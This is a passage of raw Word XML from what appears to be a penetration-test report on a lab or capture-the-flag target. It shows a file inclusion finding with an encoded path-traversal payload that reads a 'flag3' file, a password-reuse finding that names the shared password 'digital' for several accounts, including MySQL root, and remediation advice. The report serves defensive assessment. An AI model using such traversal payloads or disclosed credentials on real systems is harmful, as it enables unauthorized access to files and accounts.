            <w:r>
              <w:t xml:space="preserve"> weave like a wren hitting a patio door, but excess perspiration wafts through it like a breeze through a freshly napalmed forest, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Where</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> his body has bony extremities, the suit has sintered </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>armorgel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: feels like gritty </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jello</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, protects like a stack of telephone books.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="102A6A48" w14:textId="12992A86" w:rsidR="0058427B" w:rsidRPr="00B40A5B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06D91AE1" w14:textId="77777777" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB1D501" w14:textId="68C05E25" w:rsidR="0058427B" w:rsidRDefault="0058427B" w:rsidP="0058427B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">An authenticated attacker would be able to use this vulnerability to access sensitive information on the server. Furthermore, an unauthenticated attacker would be able to perform this vulnerability by bypassing the authentication protections on </w:t>
      </w:r>
      <w:r w:rsidRPr="0058427B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/internal/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058427B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>customers.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. For more information, please refer to the </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Insufficient_Authentication_Control" w:history="1">
        <w:r w:rsidRPr="0058427B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Insufficient Authorization Controls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> finding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52969231" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D" w:rsidP="0056593D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A60D2D5" w14:textId="3D18F643" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="0058427B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Replace the value of list with the location of a different file on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484B7231" w14:textId="1FFD8963" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Ex:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75734D18" w14:textId="518870B2" w:rsidR="0056593D" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00335D96">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00335D96">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>%2Fdata%2f..%2f..%2f..%2f..%2fhome%2fgibson%2fflag3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295DF9E0" w14:textId="77777777" w:rsidR="00DD64D1" w:rsidRPr="00D36E2B" w:rsidRDefault="00DD64D1" w:rsidP="00DD64D1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="21"/>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A2458A" w14:textId="77777777" w:rsidR="00B47DC6" w:rsidRDefault="00B47DC6" w:rsidP="00B47DC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47DC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input validation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The first and most important remediation recommendation is to implement proper input validation and sanitization of user input. All user input, including file names and paths, should be validated against a whitelist of known good values to prevent the inclusion of malicious files. Input validation should be performed both on the client and server side, and developers should use security-focused libraries to ensure that user input is properly sanitized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16529F4A" w14:textId="77777777" w:rsidR="00B47DC6" w:rsidRDefault="00B47DC6" w:rsidP="00B47DC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47DC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File path restrictions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Access controls should be implemented to restrict access to sensitive files and data on the server. Developers should ensure that the application is not allowed to access files outside of a specific directory or set of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>directories, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should use file system permission settings to ensure that only authorized users have access to sensitive files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B05A1C4" w14:textId="7AB58736" w:rsidR="00B47DC6" w:rsidRDefault="00B47DC6" w:rsidP="00B47DC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47DC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use secure coding practices</w:t>
      </w:r>
      <w:r>
        <w:t>: Developers should follow secure coding practices to ensure that their applications are not vulnerable to file inclusion attacks. This includes minimizing the use of user input in file operations, using relative rather than absolute file paths, and ensuring that all file names and paths are validated and sanitized before they are used in server-side scripts. Regular code reviews and security testing should also be performed to identify and address potential vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628D17E1" w14:textId="77777777" w:rsidR="00DD64D1" w:rsidRPr="00455A9D" w:rsidRDefault="00DD64D1" w:rsidP="00DD64D1"/>
    <w:p w14:paraId="59DA0D78" w14:textId="77777777" w:rsidR="00DD64D1" w:rsidRDefault="00DD64D1" w:rsidP="00DD64D1">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
      <w:commentRangeEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:commentReference w:id="21"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D43A2AA" w14:textId="68A16C39" w:rsidR="00DD64D1" w:rsidRDefault="00DD64D1" w:rsidP="00DD64D1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP - </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD64D1">
        <w:t>Testing for Local File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E81A3CB" w14:textId="0DB1189C" w:rsidR="00DD64D1" w:rsidRDefault="00DD64D1" w:rsidP="00DD64D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9EFAA9" w14:textId="77777777" w:rsidR="0056593D" w:rsidRDefault="0056593D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A526A2" w14:textId="503C18A8" w:rsidR="00C0551F" w:rsidRPr="001215EC" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Password Reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C7FDF9" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRPr="006F5E52" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">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C0551F" w:rsidRPr="005264D0" w14:paraId="2133048B"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B673397" w14:textId="564BF1F0" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Password Reuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C0551F" w:rsidRPr="005264D0" w14:paraId="7BC74709"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3D42166C" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRPr="00DA733E" w:rsidRDefault="00C0551F"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2B63037A" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFAFAF"/>
          </w:tcPr>
          <w:p w14:paraId="10893BC9" w14:textId="5C03E839" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C0551F" w:rsidRPr="005264D0" w14:paraId="1B3921B1"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26FD2D3E" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59BD587F" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FF8EA16" w14:textId="6D78CEF9" w:rsidR="00C0551F" w:rsidRPr="005264D0" w:rsidRDefault="00C0551F" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C0551F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C0551F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C0551F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="767A2913" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B297A" w14:textId="2B941508" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:r>
        <w:tab/>
        <w:t>This issue was present throughout the scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F52F0D5" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399DB7E6" w14:textId="6E4CF0BB" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:r>
        <w:t xml:space="preserve">The assessment team discovered that the following accounts used the string </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0551F">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>digital</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0813C76D" w14:textId="38F99E5F" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Web Application User Account </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0551F">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21B942E9" w14:textId="620C79C7" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.10.0.66 User Account </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0551F">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B9C838E" w14:textId="7B6D7F12" w:rsidR="00C0551F" w:rsidRPr="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.10.0.66 Localhost MySQL Server </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0551F">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2EE4DD" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCADEC1" w14:textId="2D869DE6" w:rsidR="00B47DC6" w:rsidRPr="00B47DC6" w:rsidRDefault="00B47DC6" w:rsidP="00B47DC6">
      <w:r>
        <w:t>Change account passwords immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550EE320" w14:textId="206458D3" w:rsidR="00C0551F" w:rsidRDefault="00C0551F" w:rsidP="00C0551F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BF5178" w14:textId="77777777" w:rsidR="00C0551F" w:rsidRDefault="00C0551F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA8B00"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA8B00"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="364AC27A" w14:textId="5FA6E580" w:rsidR="00335D96" w:rsidRPr="00542A1D" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA8B00"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA8B00"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="00542A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA8B00"/>
        </w:rPr>
        <w:t xml:space="preserve"> Risk Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62F4DF" w14:textId="06898384" w:rsidR="00335D96" w:rsidRPr="001215EC" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Cross Site Scripting (Reflected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B58D0B9" w14:textId="77777777" w:rsidR="00335D96" w:rsidRPr="006F5E52" w:rsidRDefault="00335D96" w:rsidP="00335D96">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335D96" w:rsidRPr="005264D0" w14:paraId="5AA1213E"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94C2E82" w14:textId="2EBBB83C" w:rsidR="00335D96" w:rsidRPr="005264D0" w:rsidRDefault="00250115" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Cross Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00335D96" w:rsidRPr="005264D0" w14:paraId="15DE13BF" w14:textId="77777777" w:rsidTr="00335D96">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EA8B00"/>
          </w:tcPr>
          <w:p w14:paraId="72853690" w14:textId="0E5FEBEE" w:rsidR="00335D96" w:rsidRPr="00DA733E" w:rsidRDefault="00250115" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
            <w:r w:rsidR="00335D96" w:rsidRPr="00DA733E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve"> Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD393"/>
          </w:tcPr>
          <w:p w14:paraId="7B8B39DB" w14:textId="77777777" w:rsidR="00335D96" w:rsidRPr="005264D0" w:rsidRDefault="00335D96" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD393"/>
          </w:tcPr>
          <w:p w14:paraId="27377707" w14:textId="49092395" w:rsidR="00335D96" w:rsidRPr="005264D0" w:rsidRDefault="00335D96" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00335D96" w:rsidRPr="005264D0" w14:paraId="3102E0B3" w14:textId="77777777" w:rsidTr="00335D96">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EA8B00"/>
          </w:tcPr>
          <w:p w14:paraId="03A855D1" w14:textId="77777777" w:rsidR="00335D96" w:rsidRPr="005264D0" w:rsidRDefault="00335D96" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BF0D4B7" w14:textId="77777777" w:rsidR="00335D96" w:rsidRPr="005264D0" w:rsidRDefault="00335D96" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="111D6D9D" w14:textId="3E348E72" w:rsidR="00335D96" w:rsidRPr="005264D0" w:rsidRDefault="00335D96" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00335D96">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00335D96">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00335D96">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56730380" w14:textId="199CCB3F" w:rsidR="00335D96" w:rsidRPr="00DA733E" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:commentRangeStart w:id="22"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
